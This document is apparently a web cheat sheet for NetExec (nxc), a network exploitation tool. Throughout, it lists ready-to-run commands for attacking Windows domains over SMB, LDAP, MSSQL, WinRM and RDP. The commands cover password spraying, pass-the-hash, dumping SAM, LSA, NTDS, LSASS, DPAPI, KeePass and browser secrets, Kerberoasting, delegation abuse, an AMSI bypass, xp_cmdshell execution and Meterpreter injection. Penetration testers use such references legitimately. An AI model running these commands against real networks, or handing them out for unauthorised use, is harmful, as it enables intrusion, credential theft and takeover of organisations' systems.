NetExec
NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.
Navigation
Installation for Linux
Installing NetExec with pipx
sudo apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec
Installing NetExec with pip
sudo apt install python3 python3-pip git clone https://github.com/Pennyw0rth/NetExec cd NetExec python3 -m venv . source bin/activate pip install . NetExec
Installation for Windows
Using Python and pipx
pip install pipx python -m pipx ensurepath python -m pipx install git+https://github.com/Pennyw0rth/NetExec
Both standalone binaries are available here or from the download button at the beginning of the cheat sheet.
Selecting & Using a Protocol
Available Protocols
smb ssh ldap ftp wmi winrm rdp vnc mssql nfs
Using Protocol Options
nxc <protocol> --help #View a protocols options nxc <protocol> <protocol options> #Use protocol options
Target Formats
netexec <protocol> hacker.local #Hostname format netexec <protocol> 192.168.1.0 192.168.0.2 #IP address(s) netexec <protocol> 192.168.1.0/24 #CIDR notation(s) netexec <protocol> 192.168.1.0-28 10.0.0.1-67 #IP range(s) netexec <protocol> ~/targets.txt #File containing a list of targets or combination of the above
Viewing Available Modules for a Protocol
nxc smb -L #View all modules for the SMB protocol nxc ssh -L #View all modules for the SSH protocol nxc ldap -L #View all modules for the LDAP protocol nxc ftp -L #View all modules for the FTP protocol nxc wmi -L #View all modules for the WMI protocol nxc winrm -L #View all modules for the WINRM protocol nxc rdp -L #View all modules for the RDP protocol nxc vnc -L #View all modules for the VNC protocol nxc mssql -L #View all modules for the MSSQL protocol
SMB Modules
nxc smb <target(s)> -M <module name> #Basic Syntax nxc smb <target(s)> -u 'user' -p 'pass' -M lsassy #Example of using the lsassy module nxc smb -M lsassy --options #View module options nxc smb <target(s)> -u 'user' -p 'pass' -M lsassy -o COMMAND='xxxx' #Using lsassy module option. All options are specified in the form of KEY=value ###Low Privilege Modules add-computer #Adds or deletes a domain computer backup_operator #Exploit user in backup operator group to dump NTDS coerce_plus #Module to check if the Target is vulnerable to any coerce vulns. Set LISTENER IP for coercion. dfscoerce #Module to check if the DC is vulnerable to DFSCocerc. drop-sc #Drop a searchConnector-ms file on each writable share enum_av #Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed) enum_ca #Anonymously uses RPC endpoints to hunt for ADCS CAs gpp_autologin #Searches the domain controller for registry.xml to find autologon information and returns the username and password. gpp_password #Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. ioxidresolver #This module helps you to identify hosts that have additional active interfaces ms17-010 #MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT nopac #Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user petitpotam #Module to check if the DC is vulnerable to PetitPotam. printnightmare #Check if host vulnerable to printnightmare remove-mic #Check if host vulnerable to CVE-2019-1040 scuffy #Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares shadowcoerce #Module to check if the target is vulnerable to ShadowCoerce. slinky #Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions smbghost #Module to check for the SMB dialect 3.1.1 and compression capability of the host, which is an indicator for the SMBGhost vulnerability (CVE-2020-0796). spider_plus #List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration. spooler #Detect if print spooler is enabled or not timeroast #Timeroasting exploits Windows NTP authentication to request password hashes of any computer or trust account webdav #Checks whether the WebClient service is running on the target zerologon #Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472 ###High Privilege Modules (requires admin privs) bitlocker #Enumerating BitLocker Status on target(s) If it is enabled or disabled dpapi_hash #Remotely dump Dpapi hash based on masterkeys bh_owned #Set pwned computer as owned in Bloodhound empire_exec #Uses Empire's RESTful API to generate a launcher for the specified listener and executes it enum_dns #Uses WMI to dump DNS from an AD DNS Server firefox #Dump credentials from Firefox get_netconnections #Uses WMI to query network connections. handlekatz #Get lsass dump using handlekatz64 and parse the result with pypykatz hash_spider #Dump lsass recursively from a given hash using BH to find local admins iis #Checks for credentials in IIS Application Pool configuration files using appcmd.exe impersonate #List and impersonate tokens to run command as locally logged on users install_elevated #Checks for AlwaysInstallElevated keepass_discover #Search for KeePass-related files and process. keepass_trigger #Set up a malicious KeePass trigger to export the database in cleartext. lsassy #Dump lsass and parse the result remotely with lsassy masky #Remotely dump domain user credentials via an ADCS and a KDC met_inject #Downloads the Meterpreter stager and injects it into memory mobaxterm #Remotely dump MobaXterm credentials via RemoteRegistry or NTUSER.dat export mremoteng #Dump mRemoteNG Passwords in AppData and in Desktop / Documents folders (digging recursively in them) msol #Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server nanodump #Get lsass dump using nanodump and parse the result with pypykatz notepad++ #Extracts notepad++ unsaved files. ntdsutil #Dump NTDS with ntdsutil ntlmv1 #Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled) pi #Run command as logged on users via Process Injection powershell_history #Extracts PowerShell history for all users and looks for sensitive commands. procdump #Get lsass dump using procdump64 and parse the result with pypykatz putty #Query the registry for users who saved ssh private keys in PuTTY. Download the private keys if found. rdcman #Remotely dump Remote Desktop Connection Manager (sysinternals) credentials rdp #Enables/Disables RDP recent_files #Extracts recently modified files reg-query #Performs a registry query on the machine reg-winlogon #Collect autologon credential stored in the registry remote-uac #Enable or disable remote UAC runasppl #Check if the registry value RunAsPPL is set or not schtask_as #Remotely execute a scheduled task as a logged on user security-questions #Gets security questions and answers for users on computer shadowrdp #Enables or disables shadow RDP snipped #Downloads screenshots taken by the (new) Snipping Tool teams_localdb #Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process test_connection #Pings a host uac #Checks UAC status veeam #Extracts credentials from local Veeam SQL Database vnc #Loot Passwords from VNC server and client configurations wam #Dump access token from Token Broker Cache. wcc #Check various security configuration items on Windows machines wdigest #Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1 web_delivery #Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module wifi #Get key of all wireless interfaces winscp #Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.
SMB Usage
####Scan for Vulnerabilities nxc smb <dc_ip> -u '' -p '' -M zerologon #Check if a DC is vulnerable to zerologon nxc smb <dc_ip> -u '' -p '' -M petitpotam #Check if a DC is vulnerable to petitpotam nxc smb <dc_ip> -u 'user' -p 'pass' -M nopac #Check if a DC is vulnerable nopac (Requires Credentials) nxc smb <ip> -u 'user' -p 'pass' -M printnightmare #Check for PrintNightmare nxc smb <ip> -u 'user' -p 'pass' -M smbghost #Check if target is vulnerable to SMBGhost nxc smb <ip> -u '' -p '' -M ms17-010 #Check if target is vulnerable to MS17-010 nxc smb <ip> -u 'user' -p 'pass' -M ntlm_reflection #Check if target is vulnerable to CVE-2025-33073 NTLM Reflection ###Enumeration nxc smb 10.1.1.0/24 #Returns a list of live hosts nxc smb 10.1.1.1 -u '' -p '' #Enumerate Null sessions nxc smb 10.1.1.1 -u '' -p '' --shares #Enumerate shares with Null sessions nxc smb 10.1.1.1 -u '' -p '' --pass-pol #Enumerate password policy with Null sessions nxc smb 10.1.1.1 -u '' -p '' --users #Enumerate users with Null sessions nxc smb 10.1.1.1 -u '' -p '' --groups #Enumerate groups with Null sessions nxc smb 10.1.1.0/24 --gen-relay-list relay_list.txt #Enumerates the network of live hosts and saves a list of only the hosts that don't require SMB signing nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --sessions #Enumerate active sessions on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --shares #Enumerate shares and share permissions on all hosts nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --disks #Enumerate disks on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --loggedon-users #Enumerate logged users on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --users #Enumerate domain users on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute #Enumerate users by bruteforcing the RID on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --groups #Enumerate domain groups on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --local-group #Enumerate local groups on the remote target nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --pass-pol #Enumerate the password policy of the domain nxc smb 10.1.1.1 -u 'user' -p 'pass' -M enum_av #Enumerate antivirus installed on the host. Requires Admin privileges. nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --qwinsta #Enumerate active Windows sessions. Requires Admin privileges (or local admin --local-auth) nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --reg-sessions #Enumerate logged-on users with the remote registry service nxc smb 10.1.1.1 -u 'user' -p 'pass' --interfaces #Enumerate network interfaces nxc smb 10.1.1.1 -u 'user' -p 'pass' -M lockscreendoors #Enumerate changed lockscreen executables. Requires Admin privileges (or local admin --local-auth) nxc smb 10.1.1.1 -u 'user' -p 'pass' -M sccm-recon6 #Enumerate primary site server and distribution point via recon6 nxc smb 10.1.1.1 -u 'user' -p 'pass' -M keepass_discover #Enumerate if Keepass is installed on the target system ###Password Spraying nxc smb 10.1.1.1 -u user1 user2 user3 -p Password1 #Spraying multiple users with one password nxc smb 10.1.1.1 -u user1 -p password1 password2 password3 #Spraying one user with multiple passwords nxc smb 10.1.1.1 -u /path/to/users.txt -p Password1 --continue-on-success #Spraying a file of users with a password/ Remove --continue-on-success if you want to stop on the first success. nxc smb 10.1.1.1 -u Administrator -p /path/to/passwords.txt #Spraying one user with a file of passwords nxc smb 10.1.1.1 -u user.txt -p password.txt #Sprays each user in the user file with every password in the password list ###Checking Credentials nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --local-auth #Checking local authentication with username and password nxc smb 10.1.1.0/24 -u '' -p '' --local-auth #Checking if blank username and password can authenticate locally nxc smb 10.1.1.0/24 -u 'user' -H '13b29964cc2480b4ef454c59562e675c' --local-auth #Checking if a user has local authentication access using the NTHASH nxc smb 10.1.1.0/24 -u 'user' -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth #Checking if a user has local authentication access using LM:NT hash format ###Delegation nxc smb 10.1.1.1 -u 'user' -p 'pass' --delegate Administrator #If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control. Resource Based Constrained Delegation (RBCD). nxc smb 10.1.1.1 -u 'MACHINE$' -H 'hash' --delegate Administrator --self #If you have a computer account you can (nearly) always get local administrator with the s4u2self extension ###Executing Remote Commands nxc 10.1.1.1 -u 'user' -p 'pass' -x whoami #Executes the whoami command on the remote target nxc 10.1.1.1 -u 'user' -p 'pass' -X '$PSVersionTable' #Execute PowerShell commands on the remote target nxc 10.1.1.1 -u 'user' -p 'pass' -X '$PSVersionTable' --amsi-bypass /path/payload #Bypass AMSI ###Spidering Shares nxc SMB 10.1.1.1 -u 'user' -p 'pass' --spider C\$ --pattern txt #Spider the C drive for files with txt in the file name nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus #List all readable files nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True #Dump all files from all readable shares on the target host ###Get and Put Files nxc smb 10.1.1.1 -u 'user' -p 'pass' --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt #Send a local file to the remote target nxc smb 10.1.1.1 -u 'user' -p 'pass' --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt #Get a remote file on the remote target ###Obtaining Credentials nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --sam #Dump SAM hashes. Requires Administrator privileges nxc smb 10.1.1.0/24 -u 'user' -p 'pass' --lsa #Dump LSA secrets. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds --users #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds --users --enabled #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --ntds vss #Dump the NTDS.dit from target DC. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M lsassy #Dump LSASS using Lsassy. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M nanodump #Dump LSASS using Nanodump. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi #Dump DPAPI credentials. nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi cookies #Dump DPAPI credentials. Collect all cookies in browsers nxc smb 10.1.1.1 -u 'user' -p 'pass' --dpapi nosystem #Dump DPAPI credentials. Won't collect system credentials nxc smb 10.1.1.1 -u 'user' -p 'pass' --local-auth --dpapi nosystem #Dump DPAPI credentials using local auth account. Won't collect system credentials nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm disk #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' --sccm wmi #Dump the SCCM from target. Requires Domain Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wireless #Dump the WIFI password register in Windows. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M veeam #Dump passwords used by Veeam for backup jobs. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M winscp #Dump WinSCP Credentials stored in the registry or local files. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M rdcman #Dump Remote Desktop Connection Manager credentials. Requires Administrator privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M security-questions #Dump a local user's security questions if they have them. Requires at least local Administrative privileges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M backup_operator #Dump with BackupOperator priv. You don't need local admin privs on the remote target if you are in SeBackupPrivilege nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wam #Dump access token for Azure and Microsoft 365 from Token Broker Cache. Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M wifi #Dump the WiFi password register in Windows nxc smb 10.1.1.1 -u 'user' -p 'pass' -M keepass_trigger #Dump the master password to decrypt the database. KEEPASS_CONFIG_PATH="path_from_module_discovery" nxc smb 10.1.1.1 -u 'user' -p 'pass' -M putty #Dump PuTTY private keys. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M vnc #Dump VNC passwords from RealVNC or TightVNC. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M mremoteng #Dump mRemoteNG stored credentials. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M notepad #Dump unsaved Notepad documents. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M notepad++ #Dump unsaved Notepad++ documents. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M rdcman #Dump Remote Desktop credential manager credentials. Requires Administrator or Local Administrator Priviledges nxc smb 10.1.1.1 -u 'user' -p 'pass' -M eventlog_creds #Parses Windows logs for Event ID 4688, as well as sysmon logs for Event ID 1 to extract credentials from CMD and PowerShell commands ##Changing User Passwords nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o NEWPASS=NewPassword #Change the password of the current user to NewPassword nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o NEWNTHASH=31d6cfe0d16ae931b73c59d7e0c089c0 #Change the password of the current user to new NT hash nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o USER=TargetUser NEWPASS=NewPassword #Change the password of different user nxc smb 10.1.1.1 -u 'user' -p 'pass' -M change-password -o USER=TargetUser NEWHASH=10C035D527CA60BE3ADF51996E7CD7E1 #Change the password of a different user to new NT hash
SSH Modules
No SSH modules at this time
SSH Usage
###Password Spraying nxc ssh 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success #Password spray SSH ###Testing credentials nxc ssh 10.1.1.0/24 -u 'user' -p 'pass' #Tests credentials provided nxc ssh 10.1.1.0/24 --port 2222 #Change SSH port to non-standard port
LDAP Modules
nxc ldap <target(s)> -M <module name> #Basic Syntax nxc ldap <target(s)> -u 'user' -p 'pass' -M find-computer #Example of using the find-computer module nxc ldap -M find-computer --options #View module options nxc ldap <target(s)> -u 'user' -p 'pass' -M find-computer -o COMMAND='xxxxx' #Using find-computer module option. All options are specified in the form of KEY=value ###Low Privilege Modules adcs #Find PKI Enrollment Services in Active Directory and Certificate Templates Names daclread #Read and backup the Discretionary Access Control List of objects. This module cannot read the DACLS recursively. enum_trusts #Extract all Trust Relationships, Trusting Direction, and Trust Transitivity find-computer #Finds computers in the domain via the provided text get-desc-users #Get description of the users. May contained password get-network #Query all DNS records with the corresponding IP from the domain. get-unixuserpassword #Get unixUserPassword attribute from all users in ldap get-userpassword #Get userPassword attribute from all users in ldap group-mem #Retrieves all the members within a Group groupmembership #Query the groups to which a user belongs. laps #Retrieves all LAPS passwords which the account has read permissions for. ldap-checker #Checks whether LDAP signing and binding are required and / or enforced maq #Retrieves the MachineAccountQuota domain-level attribute obsolete #Extract all obsolete operating systems from LDAP pre2k #Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each pso #Query to get PSO from LDAP sccm #Find a SCCM infrastructure in the Active Directory subnets #Retrieves the different Sites and Subnets of an Active Directory user-desc #Get user descriptions stored in Active Directory whoami #Get details of provided user ###High Privilege Modules (requires admin privs) None
LDAP Usage
###LDAP Authentication
nxc ldap 10.1.1.0/24 -u users.txt -p '' -k #Testing if an account exists without kerberos protocol
nxc ldap 10.1.1.0/24 -u 'user' -p 'pass' #Testing credentials
nxc ldap 10.1.1.0/24 -u 'user' -H 'A29F7623FD11550DEF0192DE9246F46B' #Testing hash credentials
###Enumerate Users
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --users #Enumerate all users via LDAP
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --active-users #Enumerate just the active users via LDAP
##Enumerate Domain Groups
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --groups #Enumerate all groups in the domain
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --groups "Domain Admins" #Enumerate all members in specific group via LDAP
##Query LDAP
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --query "(sAMAccountName=Administrator)" "" #An alternative to ldapsearch
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet" #Query raw ldap values you can use the query option together with filters
###ASREPRoast
nxc ldap 10.1.1.1 -u 'user' -p '' --asreproast output.txt #Retrieve the Kerberos 5 AS-REP etype 23 hash of a user without Kerberos pre-authentication required
nxc ldap 10.1.1.1 -u users.txt -p '' --asreproast output.txt #Retrieve the Kerberos 5 AS-REP etype 23 hash of a list of users without Kerberos pre-authentication required
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --asreproast output.txt #Retrieve all the users and hashes where the Kerberos pre-authentication is not required. Requires credentials
###Find Domain SID
nxc ldap DC1.hacker.local -u 'user' -p 'pass' -k --get-sid #Find the domain SID
###Kerberoasting
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --kerberoasting output.txt #Retrieve the Kerberos 5 TGS-REP etype 23 hash. Requires domain credentials
##Find Misconfigured Delegation
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --find-delegation #NetExec allows you to retrieve the list of all misconfigured delegations
###Unconstrained Delegation
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --trusted-for-delegation #Retrieve the list of all computers and users with the flag TRUSTED_FOR_DELEGATION
###Admin Count
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --admin-count #adminCount Indicates that a given object has had its ACLs changed to a more secure value
###Machine Account Quota
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M maq #Retrieve the MachineAccountQuota domain-level attribute
###Get User Descriptions
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-desc-users #Look for password inside the user's description.
###Dump gMSA
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa #Extract the password of a gMSA account
###Exploit ESC8 (ADCS)
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M adcs #List All PKI Enrollment Servers
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M adcs -o SERVER='xxxx' #List All Certificates Inside a PKI
###Extract Subnet
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network #Extract subnet over an active directory environment
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network -o ONLY_HOSTS=true #Extract subnets with hosts over an active directory environment
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M get-network -o ALL=true #Extract all subnets over an active directory environment
###Check LDAP Signing
nxc ldap -u 'user' -p 'pass' -M ldap-checker #Verify if ldap requires channel binding or not
###Read DACL Rights
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=Administrator ACTION=read #Read all the ACEs of the Administrator account
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=Hacker #Read all the rights the Hacker user has on the Administrator
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET_DN="DC=HACK-DC,DC=LOCAL" ACTION=read RIGHTS=DCSync #Read all the principals that have DCSync rights on the domain
nxc ldap hack-dc.local -k --kdcHost hack-dc.local -M daclread -o TARGET=targets.txt ACTION=backup #Backup the DACLs of multiple targets
###Extract gMSA Secrets
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa-convert-id 313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724 #Convert gMSA id
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e2.........' #convert gMSA LSM to NTLM
###BloodHound Ingestor
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --bloodhound --collection All #NetExec bloodhound collector
###List DC IP and Domain Enum Trusts
nxc ldap 10.1.1.1 -u 'user' -p 'pass' --dc-list #List Domain Controllers and their IP Addresses
###Enumerate SCCM
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M sccm -o REC_RESOLVE=TRUE #Find SCCM Site-Servers, SCCM Sites, SCCM Management Points and Users, Computers or Groups related to SCCM
###Enumerate Entra ID
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M entra-id #Find the Entra ID synchronization server
###Dump PSO
nxc ldap 10.1.1.1 -u 'user' -p 'pass' -M pso #Dump PSO (Fine-Grained Password Policies (FGPPs) or Password Settings Objects (PSOs))
FTP Modules
No FTP modules at this time
FTP Usage
###Password Spraying nxc ftp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce #FTP password spraying (without bruteforce) nxc ftp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success #FTP password spraying continue on success ###File Listing nxc ftp 10.1.1.1 -u 'user' -p 'pass' --ls #Lists FTP files on the remote host nxc ftp 10.1.1.1 -u 'user' -p 'pass' --ls 'directory' #Lists FTP Files in a specific directory on the remote host ###Download a File nxc ftp 10.1.1.1 -u 'user' -p 'pass' --get 'file' #Download a specific file from the FTP server ###Upload a file nxc ftp 10.1.1.1 -u 'user' -p 'pass' --put 'local file' 'remote file' #Upload a file to the FTP server
WMI Modules
nxc wmi <target(s)> -M <module name> #Basic Syntax nxc wmi <target(s)> -u 'user' -p 'pass' -M spooler #Using the spooler module nxc wmi -M spooler --options #View module options nxc wmi <target(s)> -u 'user' -p 'pass' -M spooler -o COMMAND='xxxxx' #Using spooler module option. All options are specified in the form of KEY=value ###Low Privilege Modules ioxidresolver #This module helps you to identify hosts that have additional active interfaces spooler #Detect if print spooler is enabled or not zerologon #Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472 ###High Privilege Modules (requires admin privs) bitlocker #Enumerating BitLocker Status on target(s) If it is enabled or disabled. enum_dns #Uses WMI to dump DNS from an AD DNS Server get_netconnections #Uses WMI to query network connections. rdp #Enables/Disables RDP
WMI Usage
###Password Spraying nxc wmi 10.1.1.0/24 -u userfile -p passwordfile #Password spraying nxc wmi 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce #Password spraying without bruteforce and continue on success ###Authentication nxc wmi 10.1.1.1 -u 'user' -p 'pass' #Testing Windows credentials with open SMB port nxc wmi 10.1.1.1 -u 'user' -p 'pass' -d Hack.local #Testing Windows credentials with closed SMB port nxc wmi 10.1.1.1 -u 'user' -p 'pass' --local-auth #Testing Local account credentials on remote target ###Command Execution nxc wmi 10.1.1.1 -u 'user' -p 'pass' -u user -p 'password' -x whoami #Execute command on remote host using WMI
MSSQL Modules
nxc mssql <target(s)> -M <module name> #Basic Syntax nxc mssql <target(s)> -u 'user' -p 'pass' -M mssql_priv #Example of using the mssql_priv module nxc mssql -M mssql_priv --options #View module options nxc mssql <target(s)> -u 'user' -p 'pass' -M mssql_priv -o COMMAND='xxxxx' #Using mssql_priv module option. All options are specified in the form of KEY=value ###Low Privilege Modules enum_impersonate #Enumerate users with impersonation privileges enum_logins #Enumerate SQL Server logins exec_on_link #Execute commands on a SQL Server linked server link_enable_xp #Enable or disable xp_cmdshell on a linked SQL server link_xpcmd #Run xp_cmdshell commands on a linked SQL server mssql_coerce #Execute arbitrary SQL commands on the target MSSQL server mssql_priv #Enumerate and exploit MSSQL privileges ###High Privilege Modules (requires admin privs) empire_exec #Uses Empire's RESTful API to generate a launcher for the specified listener and executes it enum_links #Enumerate linked SQL Servers and their login configurations met_inject #Downloads the Meterpreter stager and injects it into memory nanodump #Get lsass dump using nanodump and parse the result with pypykatz test_connection #Pings a host web_delivery #Kicks off a Metasploit payload using the exploit/multi/script/web_delivery module
MSSQL Usage
###Password Spraying nxc mssql 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce #Password spraying MSSQL (without bruteforce) nxc mssql 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success #Password spraying MSSQL (without bruteforce) and continue on success ###Authentication nxc mssql 10.1.1.1 -u 'user' -p 'pass' #Testing Windows credentials with SMB port open nxc mssql 10.1.1.1 -u 'user' -p 'pass' -d Hack.local #Testing Windows credentials with SMB port closed nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth #Testing local credentials nxc mssql 10.1.1.1 -u 'user' -p 'pass' --port 1434 #Specifying a port ###MSSQL PrivEsc nxc mssql 10.1.1.1 -u 'user' -p 'pass' -M mssql_priv #Escalate privileges from standard user to DBA ###MSSQL Command Execution nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' #Execute MSSQL command using NetExec ###MSSQL Upload & Download nxc mssql 10.1.1.1 -u 'user' -p 'pass' --put-file --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt #Upload file nxc mssql 10.1.1.1 -u 'user' -p 'pass' --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file #Download file ###Execute via xp_cmdshell nxc mssql 10.1.1.1 -u 'user' -p 'pass' --local-auth -x whoami #Execute Windows command via MSSQL using NetExec ###Enumerate Users by Bruteforcing RID nxc mssql 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute #Enumerate users by bruteforcing the RID on the remote target
WinRM Modules
No WINRM modules at this time
WinRM Usage
###Password Spraying nxc winrm 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce #Password spraying (without bruteforce) nxc winrm 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success #Password spraying (without bruteforce) and continue on success ###Authentication nxc winrm 10.1.1.0/24 -u 'user' -p 'pass' #Testing credentials nxc winrm 10.1.1.0/24 -u 'user'-p 'pass' -d Hack.local #Testing credentials if the SMB port is closed ###Command Execution nxc winrm 10.1.1.1 -u 'user' -p 'pass' -X whoami #Command execution with WinRM ###Defeating LAPS NetExec winrm 10.1.1.1 -u 'user-can-read-laps' -p 'pass' --laps #Execute a command on remote host on the domain if LAPS is used NetExec winrm 10.1.1.1 -u 'user-can-read-laps' -p 'pass' --laps 'name' #Execute a command on remote host on the domain if LAPS is used and default admin name is not administrator
RDP Modules
No RDP modules at this time
RDP Usage
###Password Spraying nxc rdp 10.1.1.0/24 -u 'user' -p 'pass' #RDP password spray nxc rdp 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce #Password spraying (without bruteforce) ###Screenshot nxc rdp 10.1.1.1 -u 'user' -p 'pass' --screenshot --screentime <seconds> #Perform an RDP screenshot ###Screenshot Without NLA nxc rdp 10.1.1.1 --nla-screenshot #Perform a screenshot of the login page of the remote host using RDP if NLA is disabled ###Command Execution nxc rdp 10.1.1.1 -x whoami #Command execution over RDP nxc rdp 10.1.1.1 -x whoami --cmd-delay --clipboard-delay #Flags to help if the target is very slow
NFS Modules
No NFS modules at this time
NFS Usage
